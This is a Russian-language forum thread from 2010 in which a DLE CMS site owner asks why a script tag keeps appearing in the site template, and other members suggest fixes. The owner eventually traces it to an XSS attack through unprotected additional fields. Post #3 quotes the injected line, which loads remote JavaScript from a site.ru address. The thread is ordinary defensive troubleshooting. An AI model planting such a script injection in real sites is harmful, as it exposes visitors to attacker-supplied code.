ФорумБлогАгентствоОтзывыПодписки
Форум о социальных сетях Поиск по форуму Инвестиции SMM обучение SMM курсы
Форум о социальных сетях Поиск по форуму Инвестиции SMM обучение SMM курсы
  • Страница 1 из 1
  • 1
Форум о поисковых системах и социальных сетях » Администратору сайта » CMS DLE » Взламывают FTP
Взламывают FTP
naxal4ik
#1
Пятница, 29.10.2010, 17:30
naxal4ik
Проверенный
Сообщения: 312
Репутация: 312
Всем привет! У меня второй день подряд в конце шаблона сайта добавляется код скрипта. Как мой пароль от FTP узнают? Что сделать, чтобы этого больше не повторилось.
Профиль
Vangan
#2
Пятница, 29.10.2010, 17:53
Vangan
Проверенный
Сообщения: 1679
Репутация: 3190
naxal4ik, в js код?добавляеться?
Если да,то там "дыра" и взлом фтп не причем .
Русский сервер игры http://rift-online.ru/
Профиль
naxal4ik
#3
Пятница, 29.10.2010, 18:01
naxal4ik
Проверенный
Сообщения: 312
Репутация: 312
<script src="http://site.ru/name.js" type="text/javascript"></script>

Вот такой код добавляется файл шаблона main.tpl, что это?

Профиль
Rembo
#4
Пятница, 29.10.2010, 20:07
Rembo
Проверенный
Сообщения: 153
Репутация: -36
http://site.ru/name.js так удли этот name.js

И меняй пароли везде.. И на сайте и на хостинге.

Профиль
naxal4ik
#5
Пятница, 29.10.2010, 20:34
naxal4ik
Проверенный
Сообщения: 312
Репутация: 312
Вчера появился этот код, сменил все пароли на ftp и в админке, а сегодня опять появился.
Профиль
xiME
#6
Суббота, 30.10.2010, 10:56
xiME
Проверенный
Сообщения: 412
Репутация: 457
Снеси DLE поставь, 9.0 закрой все баги , поменяй шаблон.
Профиль
cool@player
#7
Суббота, 30.10.2010, 10:58
cool@player
Заблокированные
Сообщения: 2872
Репутация: 4687
naxal4ik, и компьютер на вирусы проверь...
Оптимизация со вкусом качества
Профиль
CaguCT
#8
Воскресенье, 31.10.2010, 00:00
CaguCT
Проверенный
Сообщения: 266
Репутация: 4687
Quote (xiME)
закрой все баги

Наповал :D
naxal4ik
1. Антивирус поставь на комп хороший и проверь на вирусы.
2. Поставь актуальную версию движка.
3. Проверь на shell.
Профиль
xiME
#9
Воскресенье, 31.10.2010, 09:00
xiME
Проверенный
Сообщения: 412
Репутация: 457
закрой все баги(которые известны)
3. Проверь на shell. -- ну ну он так на проверяет....
Профиль
naxal4ik
#10
Воскресенье, 31.10.2010, 10:06
naxal4ik
Проверенный
Сообщения: 312
Репутация: 312
Всем спасибо, проблема решена. Это из-за дополнительных полей.

Рекомендация от разработчика CMS:
!При использовании картинки в дополнительном поле НАСТОЯТЕЛЬНО рекомендуется включить в админпанели, в настройках безопасности, режим безопасных полей. В противном случае возможен выход за пределы ссылки и проведение XSS атаки!

Режим безопасных полей был выключен, из-за этого кто-то сделал XSS атаку.

Профиль
Форум о поисковых системах и социальных сетях » Администратору сайта » CMS DLE » Взламывают FTP
  • Страница 1 из 1
  • 1
Поиск:
Форум
Социальные сети
Хостинг от uCoz